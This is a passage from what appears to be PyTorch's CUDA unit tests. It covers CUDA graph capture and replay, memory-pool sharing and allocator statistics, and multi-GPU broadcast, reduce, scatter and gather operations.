g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc + 512) // elem, 3,
3 * (kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge)),
kRoundLarge * ((kMinLargeAlloc + 512 + kRoundLarge - 1) // kRoundLarge),
"large_pool"),)
stats_to_check = ("segment.",
"reserved_bytes.",
"active.",
"active_bytes.")
gc.collect()
torch.cuda.empty_cache()
s = torch.cuda.Stream()
for (numel,
delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_cudaMalloc_bytes_post_del_g,
pool_string) in cases:
if pool_string == "small_pool":
delta_active_blocks = 2 # one from "b" plus a sneaky one from CUDAGraph's one-element rng offset holder
delta_active_bytes = numel * elem + 512 # + 512 for CUDAGraph's rng offset holder
else:
delta_active_blocks = 1 # We only check the large pool, which isn't affected by rng offset holder
delta_active_bytes = numel * elem
g = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
# Allocation stat estimates assume input is created on the same stream as capture_begin()
# (in other words, the same stream silo as the rng offset holder, which is not allocated from the
# capture's private pool).
a = torch.ones((numel,), device="cuda")
precapture_stats = torch.cuda.memory_stats()
g.capture_begin()
b = a.clone()
for _ in range(5):
b = b.clone() + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
gc.collect()
postcapture_stats = torch.cuda.memory_stats()
expecteds = (delta_cudaMallocs,
delta_cudaMalloc_bytes,
delta_active_blocks,
delta_active_bytes)
# Double checks replay and stats before and after a call to empty_cache
for i in range(2):
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postcapture_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre to post capture delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
g.replay()
self.assertEqual(b.sum().item(), 6 * numel)
if i == 0:
torch.cuda.empty_cache()
del g
gc.collect()
torch.cuda.empty_cache()
postdel_stats = torch.cuda.memory_stats()
# Uses graph result b after graph has been deleted
self.assertEqual(b.sum().item(), 6 * numel)
# b should be the only live reference remaining from the graph's private pool
expecteds = (1, delta_cudaMalloc_bytes_post_del_g, 1, numel * elem)
for stat, expected in zip(stats_to_check, expecteds):
stat = stat + pool_string + ".current"
current = postdel_stats[stat] - precapture_stats[stat]
self.assertEqual(current, expected, "Pre capture to post graph delete delta of " +
stat + " = {}, expected = {}, numel = {}".format(current, expected, numel))
# del a, b before the next case is essential, otherwise overwriting a and b in the next case
# can throw off its allocation/deallocation counts.
del a, b
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_record_stream(self):
# Makes sure graph capture defers attempting to reclaim allocations used across streams. See
# "Q. Why skip process_events if a capture might be underway?" in c10/cuda/CUDACachingAllocator.cpp
torch.cuda.empty_cache()
potential_problem = torch.zeros((3,), device="cuda")
a = torch.zeros((3,), device="cuda")
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
s2 = torch.cuda.Stream()
g = torch.cuda.CUDAGraph()
torch.cuda.synchronize()
with torch.cuda.stream(s0):
potential_problem.record_stream(s0)
torch.cuda._sleep(TestCuda.FIFTY_MIL_CYCLES)
potential_problem.fill_(1.)
del potential_problem
with torch.cuda.stream(s1):
g.capture_begin()
# potential_problem's allocation should still be outstanding. if DeviceCachingAllocator::malloc
# mistakenly calls process_events, it will trigger cudaEventQueries on potential_problem's end-of-life
# event, which will cause the capture to error.
b = a.clone()
# Let's also see what happens if we record_stream on a tensor during capture.
s2.wait_stream(s1)
with torch.cuda.stream(s2):
b.fill_(1.)
b.record_stream(s2) # dummy record_stream
del b
s1.wait_stream(s2)
g.capture_end()
torch.cuda.synchronize()
# dummy allocation triggers process_events, Hopefully successfully processes b's end-of-life event.
c = torch.zeros((3,), device="cuda")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
# If this test is the first in the process to try cudnn rnns with dropout, it'll initialize
# DropoutState's long-lived internal buffer. Calling code perceives this (correct) behavior
# as a memory leak unless we skip the leak check.
@skipCUDAMemoryLeakCheckIf(True)
def test_graph_cudnn_dropout(self):
# Tests the interaction of cuda graph capture with DropoutState's syncs in ATen/native/cudnn/RNN.cpp.
# In particular, if user runs a sequence of captured and noncaptured cudnn rnns, DropoutState should
# avoid syncing noncapturing streams with captured events or vice versa.
torch.cuda.empty_cache()
model = torch.nn.LSTM(512, 512, 2, dropout=0.5).cuda()
x = torch.ones(100, 192, 512, device="cuda")
y = model(x)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g.capture_begin()
y = model(x)
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
y = model(x)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_grad_scaling(self):
torch.cuda.empty_cache()
scaler = torch.cuda.amp.GradScaler(init_scale=4.)
g = torch.cuda.CUDAGraph()
s = torch.cuda.Stream()
weight = torch.ones((100,), device="cuda", requires_grad=True)
opt = torch.optim.SGD([weight], lr=0.1)
static_input = torch.ones_like(weight)
static_grad = torch.ones_like(weight)
# warmup
s = torch.cuda.Stream()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
torch.cuda.current_stream().wait_stream(s)
opt.zero_grad(set_to_none=True)
# capture
with torch.cuda.graph(g):
loss = (weight.half() * static_input).sum()
scaler.scale(loss).backward()
input_vals = [5, 20000, 5, 40000]
# If the scale gets updated properly, these are the scale, growth tracker,
# and grad values we expect.
expected_scales = [4, 2, 2, 1]
expected_growth_trackers = [1, 0, 1, 0]
expected_grad_vals = [5 * 4, float("inf"), 5 * 2, float("inf")]
for data, scale, growth_tracker, grad_val in zip(input_vals,
expected_scales,
expected_growth_trackers,
expected_grad_vals):
static_input.fill_(data)
g.replay()
self.assertEqual(weight.grad, torch.full_like(weight.grad, grad_val))
scaler.step(opt)
scaler.update()
self.assertEqual(scaler._scale, scale)
self.assertEqual(scaler._growth_tracker, growth_tracker)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_make_graphed_callables(self):
torch.manual_seed(5)
torch.cuda.manual_seed(5)
N, D_in, H, D_out = 640, 4096, 2048, 1024
models = []
for _ in range(2):
model_section1 = torch.nn.Sequential(torch.nn.Linear(D_in, H),
torch.nn.Dropout(p=0.1)).cuda()
model_section2 = torch.nn.Sequential(torch.nn.Linear(H, D_out),
torch.nn.Dropout(p=0.2)).cuda()
models.append(torch.nn.Sequential(model_section1, model_section2))
model_graphed = models[0]
model_control = models[1]
model_graphed.load_state_dict(model_control.state_dict())
opt_graphed = torch.optim.SGD(model_graphed.parameters(), lr=0.1)
opt_control = torch.optim.SGD(model_control.parameters(), lr=0.1)
x = torch.randn(N, D_in, device='cuda')
h = torch.randn(N, H, device='cuda', requires_grad=True)
y_pred = torch.randn(N, D_out, device='cuda', requires_grad=True)
y = torch.randn(N, D_out, device='cuda')
loss_fn_control = torch.nn.functional.mse_loss
relu_control = torch.nn.functional.relu
# This is a good stress test. It graphs four callables: two Modules and two python functions.
model_graphed[0], model_graphed[1], relu_graphed, loss_fn_graphed = \
torch.cuda.make_graphed_callables((model_graphed[0], model_graphed[1], relu_control, loss_fn_control),
((x,), (h,), (y_pred,), (y_pred, y)))
real_inputs = [torch.rand_like(x) for _ in range(10)]
real_targets = [torch.rand_like(y) for _ in range(10)]
for m, opt, relu, loss_fn in zip((model_graphed, model_control),
(opt_graphed, opt_control),
(relu_graphed, relu_control),
(loss_fn_graphed, loss_fn_control)):
# Resets RNC states before iterations for graphed and ungraphed models,
# so dropout math should be bitwise identical for both.
torch.manual_seed(5)
torch.cuda.manual_seed(5)
for data, target in zip(real_inputs, real_targets):
opt.zero_grad(set_to_none=True)
y_pred = m(data)
y_pred = relu(y_pred)
loss = loss_fn(y_pred, target)
loss.backward()
opt.step()
for p, pc in zip(model_graphed.parameters(), model_control.parameters()):
self.assertEqual(p, pc)
# We graphed the models in training mode. Eval should still run ungraphed.
model_graphed.eval()
model_control.eval()
self.assertEqual(model_graphed(real_inputs[0]), model_control(real_inputs[0]))
def test_batch_norm_gather_stats(self):
input = torch.randn(1, 3, 3, 3, device='cuda')
mean, invstd = torch.batch_norm_gather_stats(
input, mean=torch.ones(2, 3, device='cuda'), invstd=torch.ones(2, 3, device='cuda'),
running_mean=None, running_var=None , momentum=.1, eps=1e-5, count=2
)
self.assertEqual(mean, torch.ones(3, device='cuda'))
self.assertEqual(invstd, torch.ones(3, device='cuda'))
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_cuda_device_memory_allocated(self):
from torch.cuda import memory_allocated
device_count = torch.cuda.device_count()
current_alloc = [memory_allocated(idx) for idx in range(device_count)]
x = torch.ones(10, device="cuda:0")
self.assertTrue(memory_allocated(0) > current_alloc[0])
self.assertTrue(all(memory_allocated(torch.cuda.device(idx)) == current_alloc[idx] for idx in range(1, device_count)))
def test_matmul_memory_use(self):
def get_max_used():
torch.cuda.synchronize()
val = torch.cuda.max_memory_allocated()
torch.cuda.reset_peak_memory_stats()
return val
a = torch.rand(1, 32, 32, device="cuda")
b = torch.rand(24, 32, 1, device="cuda")
get_max_used()
torch.matmul(a, b)
matmul_mem = get_max_used()
a = a.expand(24, 32, 32)
torch.matmul(a, b)
matmul_expand_mem = get_max_used()
torch.bmm(a, b)
bmm_mem = get_max_used()
self.assertEqual(matmul_expand_mem, matmul_mem)
self.assertEqual(bmm_mem, matmul_mem)
class TestCudaComm(TestCase):
def _test_broadcast(self, input):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
# test regular
results = comm.broadcast(input, (0, 1))
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
if input.is_cuda and input.get_device() == i: # test not copying on same device
self.assertEqual(t.data_ptr(), input.data_ptr())
# test out=
for inplace in [True, False]:
if inplace:
outputs = [torch.empty_like(input, device=0), torch.empty_like(input, device=1)]
else:
outputs = [input.cuda(0), torch.empty_like(input, device=1)]
results = comm.broadcast(input, out=outputs)
for r, o in zip(results, outputs):
self.assertIs(r, o)
for i, t in enumerate(results):
self.assertEqual(t.get_device(), i)
self.assertEqual(t, input)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"Exactly one of 'devices' and 'out'"):
comm.broadcast(input, (0, 1), out=outputs)
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cpu()])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to have same shape as the source .+ at index 1"):
comm.broadcast(input, out=[input.cuda(0), input.cuda(1).unsqueeze(0)])
def test_broadcast_cpu(self):
self._test_broadcast(torch.randn(5, 5))
def test_broadcast_gpu(self):
self._test_broadcast(torch.randn(5, 5).cuda())
def _test_broadcast_coalesced(self, tensors, buffer_size):
b_tensors = [comm.broadcast(t, (0, 1)) for t in tensors]
for (_, bt), t in zip(b_tensors, tensors):
self.assertEqual(bt.get_device(), 1)
self.assertEqual(bt, t)
self.assertIsInstance(bt, type(t))
bc_tensors = comm.broadcast_coalesced(tensors, (0, 1), buffer_size=buffer_size)
bc_tensors_t = list(zip(*bc_tensors))
self.assertEqual(b_tensors, bc_tensors_t)
for (_, bt), (_, bct) in zip(b_tensors, bc_tensors_t):
self.assertEqual(bt.get_device(), bct.get_device())
self.assertIsInstance(bct, type(bt))
# check that tensors on device[0] are returned as-is
for out_tensors in (b_tensors, bc_tensors_t):
for inp_t, (out_t, _) in zip(tensors, out_tensors):
self.assertIs(inp_t, out_t)
# check that the tensors not on device[0] have different version counters
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for _, t in bc_tensors_t]
for old_version, (_, t) in zip(versions, bc_tensors_t):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
# Note: fails sometimes on the CI, passes on dual gfx906
def test_broadcast_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_broadcast_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_broadcast_coalesced_empty_tensors(self):
tensors = [
torch.tensor([]).byte().cuda(),
torch.randn(5).cuda(),
torch.randn(5).double().cuda()
]
self._test_broadcast_coalesced(tensors, 256)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add(self):
x = torch.randn(5, 5)
y = torch.randn(5, 5)
x_cuda = x.cuda(0)
y_cuda = y.cuda(1)
result = comm.reduce_add((x_cuda, y_cuda))
self.assertEqual(result.get_device(), 0)
self.assertEqual(result.cpu(), x + y)
def _test_reduce_add_coalesced(self, tensors, buffer_size):
dup_tensors = [tensors, [t.cuda(1) for t in tensors]]
r_tensors = [comm.reduce_add(t) for t in zip(*dup_tensors)]
for r, t in zip(r_tensors, tensors):
self.assertEqualTypeString(r, t)
self.assertEqual(r, t * 2)
rc_tensors = comm.reduce_add_coalesced(dup_tensors, buffer_size=buffer_size)
self.assertEqual(r_tensors, rc_tensors)
for r, rc in zip(r_tensors, rc_tensors):
self.assertEqualTypeString(rc, r)
# Since we have both cuda:0 and cuda:1 inputs, the outputs must be new.
# We can check that they have different version counters.
# NOTE [ Version Counter in comm.*_coalesced ]
versions = [t._version for t in rc_tensors]
for old_version, t in zip(versions, rc_tensors):
self.assertEqual(t._version, old_version)
t.zero_()
self.assertEqual(t._version, old_version + 1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced(self):
numel = 5
num_bytes = numel * 8
tensors = [
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 1, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 10, 2, 3),
make_sparse_tensor(torch.cuda.sparse.DoubleTensor, 5, 2, 3),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 7, 3, 3),
make_sparse_tensor(torch.cuda.sparse.FloatTensor, 2, 2, 3),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
make_sparse_tensor(torch.cuda.sparse.LongTensor, 3, 2, 7),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_reduce_add_coalesced_dense_only(self):
numel = 5
num_bytes = numel * 8
tensors = [
torch.randn(numel).long().cuda(),
torch.randn(numel).cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel).long().cuda(),
torch.randn(numel * 2).int().cuda(), # int is 2x shorter
torch.randn(numel).cuda(),
]
self._test_reduce_add_coalesced(tensors, num_bytes * 5 // 2)
def _test_scatter(self, input, chunk_sizes=None, dim=0):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
if chunk_sizes is None:
ref_chunk_sizes = tuple(repeat(input.size(dim) // 2, 2))
else:
ref_chunk_sizes = chunk_sizes
# test regular
result = comm.scatter(input, (0, 1), chunk_sizes, dim)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
if r.device == input.device:
self.assertEqual(r.data_ptr(), input.data_ptr()) # for target @ same device, a view should be returned
# test out
out = [torch.empty_like(t) for t in result]
result = comm.scatter(input, dim=dim, out=out)
self.assertEqual(len(result), 2)
chunk_start = 0
for i, r in enumerate(result):
self.assertIs(r, out[i])
chunk_end = chunk_start + ref_chunk_sizes[i]
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(chunk_start, chunk_end)
self.assertEqual(r, input[tuple(index)], atol=0, rtol=0)
chunk_start = chunk_end
# test error msg
if chunk_sizes is not None:
with self.assertRaisesRegex(RuntimeError, r"Expected devices and chunk_sizes to be of same length"):
comm.scatter(input, [0 for _ in range(len(chunk_sizes) + 1)], dim=dim, chunk_sizes=chunk_sizes)
with self.assertRaisesRegex(RuntimeError, r"'devices' must not be specified"):
comm.scatter(input, (0, 1), dim=dim, out=out)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one device to scatter to"):
comm.scatter(input, (), dim=dim)
with self.assertRaisesRegex(RuntimeError, r"Expected at least one output tensor to scatter to"):
comm.scatter(input, dim=dim, out=[])
with self.assertRaisesRegex(RuntimeError,
r"Expected all output tensors to be CUDA tensors, but output tensor at index 0"):
comm.scatter(input, dim=dim, out=([out[0].cpu()] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Output tensor at index 0 has incorrect shape"):
comm.scatter(input, dim=dim, out=([out[0].unsqueeze(0)] + out[1:]))
with self.assertRaisesRegex(RuntimeError, r"Total size for output tensors along scatter dim \d+ does not match"):
index = [slice(None, None) for _ in range(input.dim())]
index[dim] = slice(1, None)
comm.scatter(input, dim=dim, out=([out[0][tuple(index)]] + out[1:]))
def test_scatter_cpu(self):
self._test_scatter(torch.randn(4, 4), dim=0)
def test_scatter_cpu_dim(self):
self._test_scatter(torch.randn(4, 4), dim=1)
def test_scatter_cpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4), dim=-2)
def test_scatter_cpu_sizes(self):
self._test_scatter(torch.randn(6, 4), chunk_sizes=(2, 4))
def test_scatter_gpu(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=0)
def test_scatter_gpu_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=1)
def test_scatter_gpu_neg_dim(self):
self._test_scatter(torch.randn(4, 4).cuda(), dim=-2)
def test_scatter_gpu_sizes(self):
self._test_scatter(torch.randn(6, 4).cuda(), chunk_sizes=(2, 4))
def _test_gather(self, dim):
if not TEST_MULTIGPU:
raise unittest.SkipTest("only one GPU detected")
x = torch.randn(2, 5, device=0)
y = torch.randn(2, 5, device=1)
expected_size = list(x.size())
expected_size[dim] += y.size(dim)
expected_size = torch.Size(expected_size)
destinations = [None, torch.device('cuda:0'), torch.device('cpu')]
if torch.cuda.device_count() > 2:
destinations.append(torch.device('cuda:2'))
with torch.cuda.device(1):
for destination in destinations:
if destination is None:
expected_device = torch.device('cuda', torch.cuda.current_device())
else:
expected_device = destination
for use_out in [True, False]:
if use_out:
out = torch.empty(expected_size, device=expected_device)
result = comm.gather((x, y), dim, out=out)
self.assertIs(out, result)
else:
result = comm.gather((x, y), dim, destination=destination)
self.assertEqual(result.device, expected_device)
self.assertEqual(result.size(), expected_size)
index = [slice(None, None), slice(None, None)]
index[dim] = slice(0, x.size(dim))
self.assertEqual(result[tuple(index)], x)
index[dim] = slice(x.size(dim), x.size(dim) + y.size(dim))
self.assertEqual(result[tuple(index)], y)
# test error msg
with self.assertRaisesRegex(RuntimeError, r"'destination' must not be specified"):
comm.gather((x, y), dim, destination='cpu', out=torch.empty(expected_size, device='cpu'))
with self.assertRaisesRegex(RuntimeError, r"Expected at least one tensor to gather from"):
comm.gather(())
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to be CUDA tensors, "):
comm.gather((x.cpu(), y))
with self.assertRaisesRegex(RuntimeError, r"Expected all input tensors to have the same number of dimensions"):
comm.gather((x, y.unsqueeze(0)))
with self.assertRaisesRegex(RuntimeError, r"Input tensor at index 1 has invalid shape"):
if dim in [0, -2]:
comm.gather((x, y[:, 1:]), dim=dim)
elif dim in [1, -1]:
comm.gather((x, y[1:, :]), dim=dim)
def test_gather(self):
self._test_gather(0)
def test_gather_dim(self):
self._test_gather(1)
def test_gather_neg_dim(self):
self._test_gather(-1)
@unittest.skipIf(not TEST_MULTIGPU, "only one GPU detected")
def test_memory_format_scatter_gather(self):
nhwc = torch.randn((10, 3, 32, 32), device='cpu').contiguous(memory_format=torch.channels_last)
results = torch.cuda.comm.scatter(nhwc, (0, 1), None, 0)
for result in results:
self.assertFalse(result.is_contiguous())
self.assertTrue(result.is_contiguous(memory_format=torch.channels_last))
gathered = torch.cuda.comm.gather(results)
self.assertTrue(gathered.is_contiguous(memory_format=torch.channels_last))
def test_matmul_device_mismatch(self):
cpu = torch.rand((10, 10))
cuda = cpu.cuda()
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cpu @ cuda
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
cuda @ cpu
for s, m1, m2 in product((cpu, cuda), repeat=3):
if s.device == m1.device == m2.device:
torch.addmm(s, m1, m2)
else:
with self.assertRaisesRegex(RuntimeError, "Expected all tensors to be on the same device"):
torch.addmm(s, m1, m2)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_scatter_namedtuple(self):
# tests ability to scatter namedtuples and retrieve a list where each
# element is of the expected namedtuple type.
fields = ("a", "b")
TestNamedTupleInput_0 = collections.namedtuple("NamedTuple", fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_0(a, b)
target_gpus = [torch.device(i) for i in range(num_gpus)]
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
